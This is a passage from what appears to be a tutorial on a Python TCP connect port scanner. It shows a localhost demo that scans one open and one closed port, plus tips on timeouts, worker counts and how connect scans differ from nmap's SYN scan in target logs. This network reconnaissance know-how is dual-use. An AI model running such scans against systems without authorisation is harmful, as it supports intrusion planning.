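    """A port nothing listens on right now: bind to 0, read the assigned port, release it."""
    with socket.socket() as probe:
        probe.bind(("127.0.0.1", 0))
        return probe.getsockname()[1]


if __name__ == "__main__":
    server, open_port = start_banner_server()
    targets = [open_port, free_closed_port()]
    for port, (state, banner) in sorted(scan("127.0.0.1", targets).items()):
        print(f"{port}/tcp {state} {banner}")
    server.shutdown()
    server.server_close()
```

Keep the timeout short on a LAN and raise `workers` for a full `-p-` sweep; a connect scan completes the handshake, so unlike nmap's default SYN scan it does show up in the target's application logs.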